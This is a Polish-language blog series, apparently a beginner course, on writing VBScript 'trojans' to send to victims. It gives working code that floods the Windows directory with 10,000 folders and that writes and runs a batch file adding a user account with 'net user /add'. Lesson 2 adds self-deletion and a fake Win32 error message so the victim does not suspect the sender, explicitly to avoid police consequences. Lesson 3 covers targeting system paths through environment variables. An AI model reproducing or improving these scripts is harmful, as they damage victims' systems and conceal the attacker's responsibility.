Nie odpowiadam za nieodpowiednie wykorzystanie tego tekstu.



Re:Jak napisać wirusa zaśmiecającego dysk w C++ [KOD]
(http://pl.youtube.com/watch?v=XbyRw4dmp34&feature=related)
Przeglądając zasoby YouTube trafiłem na filmik pod tym właśnie tytułem,
oczywiście kodu nie testowałem bo nie było takiej potrzeby. A dlaczego ?
Są dwa powody :
1 . Podczas tworzenia folderów widzimy czarne okienko(dos) po zamknięciu
okienka kończony jest jego proces jak i tworzenie folderów.
2. Ponieważ sam potrafię coś takiego zrobić(nie tylko w C++) :) .

Dobra koniec mądrzenia się , przechodzimy do konkretów.
Postanowiłem napisać to w VBS w celu pokazania że nie kiedy języki
kompilowane nie są w stanie dorównać notatnikowi.W VBS nie widzimy
żadnego okienka co w tego typu programach jest podstawą .
Kod obiega na nie całe pięć linijek kodu :

'-------------------------------------- Wytnij tutaj-----------------------------------
Dim System ,i 'Zmienne
Set System = CreateObject("scripting.FileSystemObject")'FSO
For i = 1 to 10 'Początek pętli
System.CreateFolder(" Nowy Folder"&i) 'Tworzymy nowy folder(+i)
next 'Wracamy na początek (i będzie powiększane, np. For i = 1 to 100 tzn.że najpierw "i" ma wartość 1 później 2,3,4,5,6 itd.Jeżeli dojdzie do 100 kończy działanie.
'--------------------------------------- Wytnij tutaj----------------------------------

Można to zrobić też w While ale mi akurat podoba się For_Next i dlatego pozostane przy tej pętli.

Oczywiście muszę pokazać swoją wyższość i ulepszyć kod.
Zaczniemy od tego że zmienimy For i = 1 to 10 na For i = 1 to 10000 '(Myślę że dziesięć tysięcy folderów na początek wystarczy :) ).
Oczywiście nie będziemy robić tylu folderów w lokalizacji z której jest uruchamiany nasz mini trojan.Ja wybrałem sobie lokalizacje zwaną potocznie "WinDir" (metody dostania się do zmiennej systemowej w kursie poniżej)
A oto nasz upragniony kod :

'----------------------------Wytnij tutaj---------------------------------------------
On error resume next
Dim System ,i ,shell ,WinDir , Lokalizacja ' Zmienne
Set Shell = CreateObject("Wscript.Shell") 'Shell
Set System = CreateObject("scripting.FileSystemObject") 'FSO
WinDir = Shell.ExpandEnvironmentStrings("%WinDir%")' Zmienna Sys.
Lokalizacja = system.GetFolder(""&WinDir)' "idziemy" do lokalizacji wyżej
For i = 1 to 10000 ' początek pętli
System.CreateFolder(Lokalizacja&"\Nowy-Folder"&i) 'tworzymy folder
next 'koniec pętli
'------------------------------Wytnij tutaj-------------------------------------------

Oczywiście można by było zrobić tak aby nasz trojan sam się kopiował
i uruchamiał wraz ze startem systemu , ale o samo kopiowaniu będzie pewnie w następnej lekcji.

Pozdrawiam VLN.

Nie odpowiadam za nieodpowiednie wykorzystanie tego tekstu.




LekcJa 3.

Wszystko super, jesteśmy odpowiednio zabezpieczeni.Ale pisaliśmy ten plik zakładając że nasza ofiara (bo inaczej tej osoby nazwać nie można) ma partycje C: ,a co jeżeli ma np.F: G: D: itp. wtedy
główną rolę zagra On Error Resume Next bo przeskoczy prawie cały plik i wyświetli tylko komunikat o błędzie. Ale kto by męczył się nad trojanem żeby później dana osoba zobaczyła tylko Message Box???
Otóż istnieje coś takiego jak "Zmienne Środowiskowe" Aby zobaczyć jakie zmienne obsługuje Windows należy nacisnąć na klawiaturze:

-Logo Windows(zwykle na samym dole z lewej strony czwarty albo trzeci klawisz) + PauseBreak(na górze z prawej strony)

Widzimy okienko "Właściwości Systemu" mamy wypisane informacje o komputerze i systemie.

-Udajemy się do zakładki(na górze okienka) "Zaawansowane".

Na dole mamy "Zmienne Środowiskowe". Po naciśnięciu mamy dwie tabele"Zmienne użytkownika"
i "Zmienne systemowe".

Naszym celem będzie Zmienna na samym dole o nazwie "WinDir" , gdyż jest pod nią zapisana ścieżka do katalogu Windows.I obojętnie czy katalog znajduje się na partycji C: D: E: zmienna będzie wskazywać drogę dostępu do niego.W VBS tę "drogę" uzyskuje się w ten sposób:

'-------------------------------/Wytnij tu\--------------------------------------------
Dim Shell,WinDir ' Zmienne
Set Shell = CreateObject("Wscript.Shell") ' Shell
WinDir = Shell.ExpandEnvironmentStrings("%WinDir%") ' Odczytujemy zmienną systemową
Wscript.Echo "Windows : "&WinDir 'Komunikat + nasza zmienna WinDir
'-------------------------------/Wytnij tu\--------------------------------------------

A tutaj jeszcze kilka zmiennych systemowych :
%programfiles% - Ścieżka do \Program Files
%userprofile% - Ścieżka do katalogu obecnego użytkownika np.C:\Documents and Settings\Admin
%homedrive% - Główna partycja ( Zwykle C: )
%homepath% - Ścieżka do katalogu użytkonika ,bez partycji np. \Documents and Settings\Admin
%windir% - Ścieżka do katalogu Windows np.C:\Windows
%temp% - Ścieżka do katalogu tymczasowego windows np. C:\Windows\TempPowinniście zobaczyć taki efekt :

Nie odpowiadam za nieodpowiednie wykorzystanie tego tekstu.




LekcJa 2.

Napisaliśmy sobie pierwszego " trojana " ale co będzie jak ktoś zorientuje że to nasz plik coś zrobił bez jego wiedzy ??Nie mówimy tutaj o pierwotnej postaci naszego pliku(to chyba jasne).
Mogą posypać się konsekwencje , wyobraźmy sobie taką sytuacje :
Wysyłamy to komuś kto nas zna otwiera, domyśla się ,rozpowiada. Nikt niczego od nas nie przyjmie, ogólnie tracimy zaufanie.A są osoby które mogą nawet zgłosić coś takiego na policje że np.stracili bardzo ważne dane,później kaucja a może coś więcej ??? W każdym razie nie chcemy ponosić za to konsekwencji.Dlatego warto zabezpieczyć się w sposób podany niżej. Po otworzeniu naszego "test.bat" będzie go usuwał , a później wyświetli komunikat.
Na koniec pliku dopiszemy zatem :

'------------------------------------/Wytnij Tu\-------------------------------------
plik.Delete ' "plik" to ścieżka do naszego test.bat a DELETE wiadomo (skasuj,usuń)
MsgBox "Ten plik nie jest prawidłową aplikacją systemu Win32.",16,"Windows" 'Komunikat błędu.
'------------------------------------/Wytnij Tu\-------------------------------------

Po takim komunikacie nasz plik zostanie usunięty ,bo poco komu nie działająca "aplikacja" ???
Otóż gdyby coś miało być nie tak na samym początku naszego "Pierwszy.VBS" lepiej dopisać

'//////////////////////-Wytnij Tu-\\\\\\\\\\\\\\\\\\\\\\\\\\\
On Error Resume Next
'//////////////////////-Wytnij Tu-\\\\\\\\\\\\\\\\\\\\\\\\\\\

On Error Resume Next (W razie błędu zwróć następny\ą) co oznacza że w razie literówki bądź złej instrukcji pominie błąd i "skoczy" do następnej linii.

Nie odpowiadam za nieodpowiednie wykorzystanie tego tekstu.




LekcJa 1.

Nie muszę chyba dodawać że jest to kurs dla początkujących .
Będziemy potrzebować narzędzi a właściwie to notatnika :) a najlepiej Notepad++(ja go używam.)

Jeżeli macie już "narzędzia" to otwieramy Notatnik (Notepad++) bo pewnie używacie produktów Billa.G .

Musimy zastanowić się co będzie robić nasz "trojan".Może na początek zrobi plik ,wpisze coś do niego i uruchomi.

A teraz kod i wytłumaczenie :

'-------------------------/Wytnij Tu\---------------------------------------------
Const Zapis = 2 'Stała
Dim System,Plik,A,SH 'Zmienne
Set SH = CreateObject("Wscript.Shell") ' Shell
Set system= CreateObject("scripting.FileSystemObject") ' Dostanie się do systemu plików
system.CreateTextFile"C:\Test.bat" ' Tworzymy plik na partycjii C:\ z nazwą "Test" .BAT
Set plik = system.GetFile("C:\Test.bat") ' Ścieżka pliku który stworzyliśmy
Set A = plik.OpenAsTextStream(Zapis) ' Otwarcie pliku jako ciąg tekstowy (i nasza stała Zapis)
A.Write " net user VIVA_L4_N3O /add " ' Tekst który wpiszemy do pliku
A.Close ' Zamkniecie pliku
SH.Run "C:\test.bat" ' Uruchomienie naszego pliku
'-----------------------/Wytnij Tu\------------------------------------------------

Kopiujemy to(Ctrl+C) i wklejamy (Ctrl+V) do naszego Notatnika (Notepad++).
Teraz z menu "Plik" wybieramy "Zapisz jako" (szybciej [Ctrl+S]), i nadajemy nazwe np.: Pierwszy.VBS
Podspodem z "Zapisz typ jako" wybieramy "Wszystkie pliki" naciskamy na "Zapisz".

Udajemy się do lokalizacji naszego pliku i otwieramy. Zobaczyliśmy na ekranie przez chwilę czarne okienko które pochwili zniknie.Ale dalej nie wiemy co nasz trojan zrobił.A więc udajemy się
do "Panelu Sterowania " następnie do "Konta użytkowników" powinniśmy zobaczyć konto o nazwie
"VIVA_L4_N3O".Jak to możliwe ??? Otórz do pliku "test.bat" wpisaliśmy :
"net user VIVA_L4_N3O /add "
Jest to komenda DOS'a która tworzy nowego użytkownika w systemie.

Jeżeli kompilacja wyrzuca błąd to nie przejmujcie się tylko poczytajcie następne Lekcje.

Niebawem dodam !!!

PS : Testujcie to na koncie z uprawnieniami
Administratora (ROOT'a)

Miłej zabawy !!!

VLN

Pierwszy wpis ! Piszę go głównie dlatego aby zobaczyć jak się prezentuje.Na tym blogu będę publikował moje "kursy" dotyczące programowania.Życzę miłej zabawy.       Więcej w "O Mnie"